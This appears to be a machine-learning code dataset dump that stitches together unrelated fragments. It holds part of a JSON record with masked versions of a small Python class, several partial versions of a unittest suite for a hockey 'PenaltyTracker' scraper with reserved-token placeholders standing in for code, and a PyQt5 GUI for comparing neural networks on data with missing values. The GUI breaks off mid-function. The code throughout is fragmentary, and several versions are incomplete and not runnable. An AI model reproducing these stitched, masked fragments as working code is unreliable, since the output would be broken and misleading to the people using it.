"blob_id": "d3af5ac87474a99f1ade222995884bc8e035ce35",
"index": 6142,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Office(Room):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Office(Room):\n\n def __init__(self):\n pass\n",
"step-4": "from room import Room\n\n\nclass Office(Room):\n\n def __init__(self):\n pass\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class TestingPenaltyTracker(unittest.TestCase):
<|reserved_special_token_0|>
@classmethod
def tearDownClass(cls):
cls.testPenaltyTracker = None
cls.controlDatabase = None
os.remove(os.path.join(os.getcwd(), 'Tests', 'test_penalty.db'))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def testPenaltyProcessing(self):
self.testPenaltyTracker.setTargetDate('2016-10-24')
self.testPenaltyTracker.run()
self.assertEqual(self.controlDatabase.getHighestID(), self.
testPenaltyTracker.databaseManager.getHighestID())
getAllCommand = 'SELECT * FROM PenaltyTracker'
controlRows = self.controlDatabase.getData(getAllCommand)
testRows = self.testPenaltyTracker.databaseManager.getData(
getAllCommand)
self.assertEqual(controlRows, testRows)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestingPenaltyTracker(unittest.TestCase):
<|reserved_special_token_0|>
@classmethod
def tearDownClass(cls):
cls.testPenaltyTracker = None
cls.controlDatabase = None
os.remove(os.path.join(os.getcwd(), 'Tests', 'test_penalty.db'))
def testGameUrls(self):
self.testPenaltyTracker.setTargetDate('2016-02-26')
numberOfGames = len(self.testPenaltyTracker.GetGameURLS())
self.assertEqual(numberOfGames, 5)
def testSetDBLocation(self):
self.assertNotEqual(self.testPenaltyTracker.databaseManager, None)
def testPenaltyProcessing(self):
self.testPenaltyTracker.setTargetDate('2016-10-24')
self.testPenaltyTracker.run()
self.assertEqual(self.controlDatabase.getHighestID(), self.
testPenaltyTracker.databaseManager.getHighestID())
getAllCommand = 'SELECT * FROM PenaltyTracker'
controlRows = self.controlDatabase.getData(getAllCommand)
testRows = self.testPenaltyTracker.databaseManager.getData(
getAllCommand)
self.assertEqual(controlRows, testRows)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestingPenaltyTracker(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.testPTDatabase = os.path.join(os.getcwd(), 'Tests',
'test_penalty.db')
cls.testPenaltyTracker = PenaltyTracker()
cls.testPenaltyTracker.setDatabaseLocation(cls.testPTDatabase)
cls.testPenaltyTracker.setSeason('PenaltyTracker')
cls.testPenaltyTracker.createAndSetDatabaseManager()
controlPath = os.path.join(os.getcwd(), 'Tests',
'season_test_10-24-16.db')
cls.controlDatabase = DatabaseManager(controlPath, 'PenaltyTracker')
@classmethod
def tearDownClass(cls):
cls.testPenaltyTracker = None
cls.controlDatabase = None
os.remove(os.path.join(os.getcwd(), 'Tests', 'test_penalty.db'))
def testGameUrls(self):
self.testPenaltyTracker.setTargetDate('2016-02-26')
numberOfGames = len(self.testPenaltyTracker.GetGameURLS())
self.assertEqual(numberOfGames, 5)
def testSetDBLocation(self):
self.assertNotEqual(self.testPenaltyTracker.databaseManager, None)
def testPenaltyProcessing(self):
self.testPenaltyTracker.setTargetDate('2016-10-24')
self.testPenaltyTracker.run()
self.assertEqual(self.controlDatabase.getHighestID(), self.
testPenaltyTracker.databaseManager.getHighestID())
getAllCommand = 'SELECT * FROM PenaltyTracker'
controlRows = self.controlDatabase.getData(getAllCommand)
testRows = self.testPenaltyTracker.databaseManager.getData(
getAllCommand)
self.assertEqual(controlRows, testRows)
<|reserved_special_token_1|>
from PenaltyTracker import PenaltyTracker
from DatabaseManager import DatabaseManager
import unittest, os, sys, shutil, filecmp
class TestingPenaltyTracker(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.testPTDatabase = os.path.join(os.getcwd(), 'Tests',
'test_penalty.db')
cls.testPenaltyTracker = PenaltyTracker()
cls.testPenaltyTracker.setDatabaseLocation(cls.testPTDatabase)
cls.testPenaltyTracker.setSeason('PenaltyTracker')
cls.testPenaltyTracker.createAndSetDatabaseManager()
controlPath = os.path.join(os.getcwd(), 'Tests',
'season_test_10-24-16.db')
cls.controlDatabase = DatabaseManager(controlPath, 'PenaltyTracker')
@classmethod
def tearDownClass(cls):
cls.testPenaltyTracker = None
cls.controlDatabase = None
os.remove(os.path.join(os.getcwd(), 'Tests', 'test_penalty.db'))
def testGameUrls(self):
self.testPenaltyTracker.setTargetDate('2016-02-26')
numberOfGames = len(self.testPenaltyTracker.GetGameURLS())
self.assertEqual(numberOfGames, 5)
def testSetDBLocation(self):
self.assertNotEqual(self.testPenaltyTracker.databaseManager, None)
def testPenaltyProcessing(self):
self.testPenaltyTracker.setTargetDate('2016-10-24')
self.testPenaltyTracker.run()
self.assertEqual(self.controlDatabase.getHighestID(), self.
testPenaltyTracker.databaseManager.getHighestID())
getAllCommand = 'SELECT * FROM PenaltyTracker'
controlRows = self.controlDatabase.getData(getAllCommand)
testRows = self.testPenaltyTracker.databaseManager.getData(
getAllCommand)
self.assertEqual(controlRows, testRows)
<|reserved_special_token_1|>
from PenaltyTracker import PenaltyTracker
from DatabaseManager import DatabaseManager
import unittest, os, sys, shutil, filecmp
class TestingPenaltyTracker(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.testPTDatabase = os.path.join( os.getcwd(), "Tests", "test_penalty.db")
cls.testPenaltyTracker = PenaltyTracker()
cls.testPenaltyTracker.setDatabaseLocation(cls.testPTDatabase)
cls.testPenaltyTracker.setSeason("PenaltyTracker")
cls.testPenaltyTracker.createAndSetDatabaseManager()
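        # control database with known-good results for 2016-10-24, used to validate the scraped data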
controlPath = os.path.join(os.getcwd(), "Tests", "season_test_10-24-16.db")
cls.controlDatabase = DatabaseManager(controlPath, "PenaltyTracker")
@classmethod
def tearDownClass(cls):
cls.testPenaltyTracker = None
cls.controlDatabase = None
os.remove( os.path.join( os.getcwd(), "Tests", "test_penalty.db") )
def testGameUrls(self):
self.testPenaltyTracker.setTargetDate("2016-02-26")
numberOfGames = len( self.testPenaltyTracker.GetGameURLS() )
self.assertEqual( numberOfGames, 5 )
def testSetDBLocation(self):
self.assertNotEqual(self.testPenaltyTracker.databaseManager, None )
def testPenaltyProcessing(self):
# generate the test data
        self.testPenaltyTracker.setTargetDate("2016-10-24")
        self.testPenaltyTracker.run()
self.assertEqual( self.controlDatabase.getHighestID(), self.testPenaltyTracker.databaseManager.getHighestID() )
getAllCommand = "SELECT * FROM PenaltyTracker"
controlRows = self.controlDatabase.getData(getAllCommand)
testRows = self.testPenaltyTracker.databaseManager.getData(getAllCommand)
self.assertEqual(controlRows, testRows)
|
flexible
|
{
"blob_id": "607d8bc79caa9d767bdb7e77a5db52295d90236f",
"index": 1759,
"step-1": "<mask token>\n\n\nclass TestingPenaltyTracker(unittest.TestCase):\n <mask token>\n\n @classmethod\n def tearDownClass(cls):\n cls.testPenaltyTracker = None\n cls.controlDatabase = None\n os.remove(os.path.join(os.getcwd(), 'Tests', 'test_penalty.db'))\n <mask token>\n <mask token>\n\n def testPenaltyProcessing(self):\n self.testPenaltyTracker.setTargetDate('2016-10-24')\n self.testPenaltyTracker.run()\n self.assertEqual(self.controlDatabase.getHighestID(), self.\n testPenaltyTracker.databaseManager.getHighestID())\n getAllCommand = 'SELECT * FROM PenaltyTracker'\n controlRows = self.controlDatabase.getData(getAllCommand)\n testRows = self.testPenaltyTracker.databaseManager.getData(\n getAllCommand)\n self.assertEqual(controlRows, testRows)\n",
"step-2": "<mask token>\n\n\nclass TestingPenaltyTracker(unittest.TestCase):\n <mask token>\n\n @classmethod\n def tearDownClass(cls):\n cls.testPenaltyTracker = None\n cls.controlDatabase = None\n os.remove(os.path.join(os.getcwd(), 'Tests', 'test_penalty.db'))\n\n def testGameUrls(self):\n self.testPenaltyTracker.setTargetDate('2016-02-26')\n numberOfGames = len(self.testPenaltyTracker.GetGameURLS())\n self.assertEqual(numberOfGames, 5)\n\n def testSetDBLocation(self):\n self.assertNotEqual(self.testPenaltyTracker.databaseManager, None)\n\n def testPenaltyProcessing(self):\n self.testPenaltyTracker.setTargetDate('2016-10-24')\n self.testPenaltyTracker.run()\n self.assertEqual(self.controlDatabase.getHighestID(), self.\n testPenaltyTracker.databaseManager.getHighestID())\n getAllCommand = 'SELECT * FROM PenaltyTracker'\n controlRows = self.controlDatabase.getData(getAllCommand)\n testRows = self.testPenaltyTracker.databaseManager.getData(\n getAllCommand)\n self.assertEqual(controlRows, testRows)\n",
"step-3": "<mask token>\n\n\nclass TestingPenaltyTracker(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.testPTDatabase = os.path.join(os.getcwd(), 'Tests',\n 'test_penalty.db')\n cls.testPenaltyTracker = PenaltyTracker()\n cls.testPenaltyTracker.setDatabaseLocation(cls.testPTDatabase)\n cls.testPenaltyTracker.setSeason('PenaltyTracker')\n cls.testPenaltyTracker.createAndSetDatabaseManager()\n controlPath = os.path.join(os.getcwd(), 'Tests',\n 'season_test_10-24-16.db')\n cls.controlDatabase = DatabaseManager(controlPath, 'PenaltyTracker')\n\n @classmethod\n def tearDownClass(cls):\n cls.testPenaltyTracker = None\n cls.controlDatabase = None\n os.remove(os.path.join(os.getcwd(), 'Tests', 'test_penalty.db'))\n\n def testGameUrls(self):\n self.testPenaltyTracker.setTargetDate('2016-02-26')\n numberOfGames = len(self.testPenaltyTracker.GetGameURLS())\n self.assertEqual(numberOfGames, 5)\n\n def testSetDBLocation(self):\n self.assertNotEqual(self.testPenaltyTracker.databaseManager, None)\n\n def testPenaltyProcessing(self):\n self.testPenaltyTracker.setTargetDate('2016-10-24')\n self.testPenaltyTracker.run()\n self.assertEqual(self.controlDatabase.getHighestID(), self.\n testPenaltyTracker.databaseManager.getHighestID())\n getAllCommand = 'SELECT * FROM PenaltyTracker'\n controlRows = self.controlDatabase.getData(getAllCommand)\n testRows = self.testPenaltyTracker.databaseManager.getData(\n getAllCommand)\n self.assertEqual(controlRows, testRows)\n",
"step-4": "from PenaltyTracker import PenaltyTracker\nfrom DatabaseManager import DatabaseManager\nimport unittest, os, sys, shutil, filecmp\n\n\nclass TestingPenaltyTracker(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.testPTDatabase = os.path.join(os.getcwd(), 'Tests',\n 'test_penalty.db')\n cls.testPenaltyTracker = PenaltyTracker()\n cls.testPenaltyTracker.setDatabaseLocation(cls.testPTDatabase)\n cls.testPenaltyTracker.setSeason('PenaltyTracker')\n cls.testPenaltyTracker.createAndSetDatabaseManager()\n controlPath = os.path.join(os.getcwd(), 'Tests',\n 'season_test_10-24-16.db')\n cls.controlDatabase = DatabaseManager(controlPath, 'PenaltyTracker')\n\n @classmethod\n def tearDownClass(cls):\n cls.testPenaltyTracker = None\n cls.controlDatabase = None\n os.remove(os.path.join(os.getcwd(), 'Tests', 'test_penalty.db'))\n\n def testGameUrls(self):\n self.testPenaltyTracker.setTargetDate('2016-02-26')\n numberOfGames = len(self.testPenaltyTracker.GetGameURLS())\n self.assertEqual(numberOfGames, 5)\n\n def testSetDBLocation(self):\n self.assertNotEqual(self.testPenaltyTracker.databaseManager, None)\n\n def testPenaltyProcessing(self):\n self.testPenaltyTracker.setTargetDate('2016-10-24')\n self.testPenaltyTracker.run()\n self.assertEqual(self.controlDatabase.getHighestID(), self.\n testPenaltyTracker.databaseManager.getHighestID())\n getAllCommand = 'SELECT * FROM PenaltyTracker'\n controlRows = self.controlDatabase.getData(getAllCommand)\n testRows = self.testPenaltyTracker.databaseManager.getData(\n getAllCommand)\n self.assertEqual(controlRows, testRows)\n",
"step-5": "from PenaltyTracker import PenaltyTracker\nfrom DatabaseManager import DatabaseManager\nimport unittest,os,sys,shutil, filecmp\n\nclass TestingPenaltyTracker(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.testPTDatabase = os.path.join( os.getcwd(), \"Tests\", \"test_penalty.db\")\n cls.testPenaltyTracker = PenaltyTracker()\n cls.testPenaltyTracker.setDatabaseLocation(cls.testPTDatabase)\n cls.testPenaltyTracker.setSeason(\"PenaltyTracker\")\n cls.testPenaltyTracker.createAndSetDatabaseManager()\n\n controlPath = os.path.join(os.getcwd(), \"Tests\", \"season_test_10-24-16.db\")\n cls.controlDatabase = DatabaseManager(controlPath, \"PenaltyTracker\")\n\n @classmethod\n def tearDownClass(cls):\n cls.testPenaltyTracker = None\n cls.controlDatabase = None\n os.remove( os.path.join( os.getcwd(), \"Tests\", \"test_penalty.db\") )\n\n def testGameUrls(self):\n self.testPenaltyTracker.setTargetDate(\"2016-02-26\")\n numberOfGames = len( self.testPenaltyTracker.GetGameURLS() )\n self.assertEqual( numberOfGames, 5 )\n\n def testSetDBLocation(self):\n self.assertNotEqual(self.testPenaltyTracker.databaseManager, None )\n\n def testPenaltyProcessing(self):\n # generate the test data\n self.testPenaltyTracker.setTargetDate(\"2016-10-24\") \n self.testPenaltyTracker.run();\n\n self.assertEqual( self.controlDatabase.getHighestID(), self.testPenaltyTracker.databaseManager.getHighestID() )\n \n getAllCommand = \"SELECT * FROM PenaltyTracker\"\n controlRows = self.controlDatabase.getData(getAllCommand)\n testRows = self.testPenaltyTracker.databaseManager.getData(getAllCommand)\n self.assertEqual(controlRows, testRows)\n\n\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
import sys
from PyQt5.QtWidgets import (QMainWindow, QWidget, QHBoxLayout, QVBoxLayout, QFrame,
QSplitter, QStyleFactory, QApplication, QPushButton, QTextEdit, QLabel, QFileDialog, QMessageBox)
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFont, QColor
import myLoadData
from UIPack import setLossParameterDialog, showDataWidget, setModelParametersDialog, TrainingWidget, showResultWidget,\
showJudgeWidgets, chooseJudgeDataSetWidget
from MyCombCNNPack import combineNumCalculate, myCombineCNN, traditionalNN, Judgement
class MyMainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.windowLength = 1250
self.windowHigh = 900
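        # per-model state, keyed 'New' (combine-CNN) and 'Tra' (traditional NN)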
self.fname = dict()
self.fname['New'] = None
self.fname['Tra'] = None
self.dataLossRate = dict()
self.dataSetLossValue = dict()
self.dataFor = dict()
self.dataFor['New'] = None
self.dataLossRate['New'] = 0.
self.dataSetLossValue['New'] = 0.
self.dataFor['Tra'] = None
self.dataLossRate['Tra'] = 0.
self.dataSetLossValue['Tra'] = 0.
self.traingWidgetOnFlag = dict()
self.traingWidgetOnFlag['New'] = False
self.traingWidgetOnFlag['Tra'] = False
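        # default combine-CNN hyperparameters: conv/pooling combination sizes, conv core count, and fully-connected output/input ratio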
self.combineNumConv = 2
self.convCoreNum = 5
self.combineNumPooling = 4
self.fullConnectOutInRate = 0.5
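        # model and training-window handles, filled in lazily by training or loadModel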
self.mcbcnn = None
self.trann = None
self.trainingW = None
self.trainingWT = None
self.initUI()
self.initConnect()
def initUI(self):
self.statusBar().showMessage('Ready')
####### data module #######
dataModule = QVBoxLayout()
self.dataFileChooseButton = QPushButton('选择数据')
self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))
self.dataShowButton = QPushButton('展示数据')
self.dataShowButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataName = QLabel('None')
self.presentDataName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataName)
dataModule.addStretch(1)
dataModule.addLayout(labelbox)
dataModule.addStretch(1)
dataModule.addWidget(self.dataFileChooseButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataLossSimulateSettingButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataShowButton)
dataModule.addStretch(1)
###### training module ########
trainingModule = QVBoxLayout()
self.setModelParametersButton = QPushButton('Model Parameters')
self.setModelParametersButton.setFont(QFont('微软雅黑', 16))
# self.setTrainingParametersButton = QPushButton('Trainning Parameters')
# self.setTrainingParametersButton.setFont(QFont('微软雅黑', 16))
self.trainingButton = QPushButton('Training')
self.trainingButton.setFont(QFont('微软雅黑', 16))
self.saveModelButton = QPushButton('Save Model')
self.saveModelButton.setFont(QFont('微软雅黑', 16))
self.loadModelButton = QPushButton('Load Model')
self.loadModelButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelName = QLabel('None')
self.presentModelName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelName)
trainingModule.addStretch(1)
trainingModule.addLayout(labelbox)
trainingModule.addStretch(1)
trainingModule.addWidget(self.setModelParametersButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.trainingButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.saveModelButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.loadModelButton)
trainingModule.addStretch(1)
############## new cnn result show ######
resultShowModule = QVBoxLayout()
self.showResultButton = QPushButton('分类结果展示')
self.showResultButton.setFont(QFont('微软雅黑', 16))
self.judgeResultButton = QPushButton('分类结果评估')
self.judgeResultButton.setFont(QFont('微软雅黑', 16))
resultShowModule.addWidget(self.showResultButton)
resultShowModule.addWidget(self.judgeResultButton)
################# new algorithm ui ##########
hboxTop = QHBoxLayout()
hboxTop.addStretch(1)
mcnnLabel = QLabel('Combine-CNN:')
mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxTop.addWidget(mcnnLabel)
hboxTop.addStretch(1)
hboxTop.addLayout(dataModule)
hboxTop.addStretch(1)
hboxTop.addLayout(trainingModule)
hboxTop.addStretch(1)
hboxTop.addLayout(resultShowModule)
hboxTop.addStretch(1)
#########traditional data module##########
dataModuleT = QVBoxLayout()
self.dataFileChooseButtonT = QPushButton('选择数据')
self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))
self.dataPreProcessButtonT = QPushButton('数据预处理')
self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))
self.dataShowButtonT = QPushButton('展示数据')
self.dataShowButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataNameT = QLabel('None')
self.presentDataNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataNameT)
dataModuleT.addStretch(1)
dataModuleT.addLayout(labelbox)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataFileChooseButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataPreProcessButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataShowButtonT)
dataModuleT.addStretch(1)
###### training module ########
trainingModuleT = QVBoxLayout()
self.setModelParametersButtonT = QPushButton('Model Parameters')
self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))
self.trainingButtonT = QPushButton('Training')
self.trainingButtonT.setFont(QFont('微软雅黑', 16))
self.saveModelButtonT = QPushButton('Save Model')
self.saveModelButtonT.setFont(QFont('微软雅黑', 16))
self.loadModelButtonT = QPushButton('Load Model')
self.loadModelButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelNameT = QLabel('None')
self.presentModelNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelNameT)
trainingModuleT.addStretch(1)
trainingModuleT.addLayout(labelbox)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.setModelParametersButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.trainingButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.saveModelButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.loadModelButtonT)
trainingModuleT.addStretch(1)
############## traditional nn result show ######
resultShowModuleT = QVBoxLayout()
self.showResultButtonT = QPushButton('分类结果展示')
self.showResultButtonT.setFont(QFont('微软雅黑', 16))
self.judgeResultButtonT = QPushButton('分类结果评估')
self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))
resultShowModuleT.addWidget(self.showResultButtonT)
resultShowModuleT.addWidget(self.judgeResultButtonT)
####### traditional algorithm #########
        hboxBottom = QHBoxLayout()
hboxBottom.addStretch(1)
traditionNNLabel = QLabel('Traditional NN:')
traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxBottom.addWidget(traditionNNLabel)
hboxBottom.addStretch(1)
hboxBottom.addLayout(dataModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(trainingModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(resultShowModuleT)
hboxBottom.addStretch(1)
########## whole frame layout ########
splitterLine = QLabel(self)
splitterLine.setFont(QFont('Times', 1))
col = QColor(0, 0, 0)
splitterLine.setStyleSheet("QWidget { background-color: %s }" % col.name())
splitterLine.resize(splitterLine.sizeHint())
vbox = QVBoxLayout()
vbox.addLayout(hboxTop)
# vbox.addWidget(QLabel(str('_'*int(self.width()/3))))
vbox.addWidget(splitterLine)
vbox.addLayout(hboxBottom)
mainWidget = QWidget()
mainWidget.setLayout(vbox)
self.setCentralWidget(mainWidget)
self.setGeometry(350, 100, self.windowLength, self.windowHigh)
self.setWindowTitle('适用于有缺失值数据集的神经网络系统')
self.show()
def initConnect(self):
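        # both button sets share the same slots; each slot dispatches on self.sender()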
self.dataFileChooseButton.clicked.connect(self.chooseData)
self.dataFileChooseButtonT.clicked.connect(self.chooseData)
self.dataLossSimulateSettingButton.clicked.connect(self.setLossParameter)
self.dataLossSimulateSettingButtonT.clicked.connect(self.setLossParameter)
self.dataShowButton.clicked.connect(self.showData)
self.dataShowButtonT.clicked.connect(self.showData)
self.dataPreProcessButtonT.clicked.connect(self.preProcess)
self.setModelParametersButton.clicked.connect(self.setModelParameters)
self.setModelParametersButtonT.clicked.connect(self.setModelParameters)
self.trainingButton.clicked.connect(self.training)
self.trainingButtonT.clicked.connect(self.training)
self.saveModelButton.clicked.connect(self.saveModel)
self.saveModelButtonT.clicked.connect(self.saveModel)
self.loadModelButton.clicked.connect(self.loadModel)
self.loadModelButtonT.clicked.connect(self.loadModel)
self.showResultButton.clicked.connect(self.showResult)
self.showResultButtonT.clicked.connect(self.showResult)
self.judgeResultButton.clicked.connect(self.showJudge)
self.judgeResultButtonT.clicked.connect(self.showJudge)
############ data load module #####################
def chooseData(self):
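        # getOpenFileName returns (path, selected_filter); the filter string is empty on cancel, so it doubles as an ok flag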
if self.sender() is self.dataFileChooseButton:
self.fname['New'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)')
if ok:
# dataname = self.fname['New'].split('/')[-1].split('.')[0]
# # print(dataname)
# self.presentDataName.setText(dataname)
# self.presentDataName.resize(self.presentDataName.sizeHint())
self.loadData()
elif self.sender() is self.dataFileChooseButtonT:
self.fname['Tra'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)')
if ok:
# dataname = self.fname['Tra'].split('/')[-1].split('.')[0]
# # print(dataname)
# self.presentDataNameT.setText(dataname)
# self.presentDataNameT.resize(self.presentDataNameT.sizeHint())
self.loadData()
return
def loadData(self):
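        # mirrored branches: load the chosen file with the stored loss rate and placeholder value, then update the data-name label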
if self.sender() is self.dataFileChooseButton:
try:
self.dataFor['New'] = myLoadData.loadData(self.fname['New'], self.dataLossRate['New'], self.dataSetLossValue['New'])
# print(self.dataFor['New'].DataTrainX, '\n', self.dataFor['New'].DataTrainY)
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message', "Data file not exist",
QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message', "Data file format error",
QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['New'].split('/')[-1].split('.')[0]
# print(dataname)
self.presentDataName.setText(dataname)
self.presentDataName.resize(self.presentDataName.sizeHint())
elif self.sender() is self.dataFileChooseButtonT:
try:
self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'], self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])
# print(self.dataFor['Tra'].DataTrainX, '\n', self.dataFor['Tra'].DataTrainY)
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message', "Data file not exist",
QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message', "Data file format error",
QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['Tra'].split('/')[-1].split('.')[0]
# print(dataname)
self.presentDataNameT.setText(dataname)
self.presentDataNameT.resize(self.presentDataNameT.sizeHint())
return
def setLossParameter(self):
if self.sender() is self.dataLossSimulateSettingButton:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog('combine-CNN设置缺失参数', self, 'New')
elif self.sender() is self.dataLossSimulateSettingButtonT:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog('traditional NN设置缺失参数', self, 'Tra')
# print(self.dataLossRate)
# print(self.dataSetLossValue)
return
def showData(self):
if self.sender() is self.dataShowButton:
# print(1)
self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示', self, 'New')
elif self.sender() is self.dataShowButtonT:
# print(1)
self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示', self, 'Tra')
return
def preProcess(self):
if self.dataFor['Tra'] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',
QMessageBox.Yes, QMessageBox.Yes)
else:
self.dataFor['Tra'].MeanPreProcess()
reply = QMessageBox.information(self, 'Message', 'PreProcess succeed!',
QMessageBox.Yes, QMessageBox.Yes)
return
############## training module #################
def setModelParameters(self):
if self.sender() is self.setModelParametersButton:
# print(1)
self.setModelParaW = setModelParametersDialog.setLossParameterDialog('combine-CNN模型参数设置', self, 'New')
elif self.sender() is self.setModelParametersButtonT:
self.setModelParaW = setModelParametersDialog.setLossParameterDialog('traditional NN模型参数设置', self, 'Tra')
def training(self):
if self.sender() is self.trainingButton:
if self.trainingW is not None:
self.trainingW.hide()
# print(self.trainingW)
self.trainingW.show()
return
senderName = 'New'
elif self.sender() is self.trainingButtonT:
            if self.trainingWT is not None:
                self.trainingWT.hide()
                self.trainingWT.show()
                return
senderName = 'Tra'
if self.dataFor[senderName] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',
QMessageBox.Yes, QMessageBox.Yes)
return
elif senderName == 'New':
if self.dataFor[senderName].DataTrainX.shape[1] < self.combineNumConv:
reply = QMessageBox.information(self, '参数错误', '卷积层组合(卷积核)大小大于数据集特征数量',
QMessageBox.Yes, QMessageBox.Yes)
return
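            # the conv stage emits one value per feature combination, so the pooling combination size must fit within that count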
if combineNumCalculate.combineNumCal(self.dataFor[senderName].DataTrainX.shape[1], self.combineNumConv)\
< self.combineNumPooling:
reply = QMessageBox.information(self, '参数错误', '池化层组合(池化核)大小大于卷积层输出特征向量维度',
QMessageBox.Yes, QMessageBox.Yes)
return
# print(self.trainingW)
if self.trainingWT is not None:
reply = QMessageBox.information(self, '提示', 'traditional NN训练正在进行,请等待其结束',
QMessageBox.Yes, QMessageBox.Yes)
return
self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练', self, senderName)
self.traingWidgetOnFlag[senderName] = False
elif senderName == 'Tra':
if self.trainingW is not None:
reply = QMessageBox.information(self, '提示', 'combine-CNN训练正在进行,请等待其结束',
QMessageBox.Yes, QMessageBox.Yes)
return
self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练', self, senderName)
self.traingWidgetOnFlag[senderName] = False
return
def saveModel(self):
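        # symmetric branches: serialize whichever model matches the clicked button to a JSON file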
if self.sender() is self.saveModelButton:
if self.mcbcnn is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\myCombineCNN.cbcnn.json',
'Combine-CNN json files (*.cbcnn.json)')
if ok:
succeed = self.mcbcnn.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果', '模型保存成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.saveModelButtonT:
if self.trann is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\traditionalNN.trann.json',
'Traditional NN json files (*.trann.json)')
if ok:
succeed = self.trann.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果', '模型保存成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
def loadModel(self):
if self.sender() is self.loadModelButton:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..',
'Combine-CNN json files (*.cbcnn.json)')
if ok:
if self.mcbcnn is None:
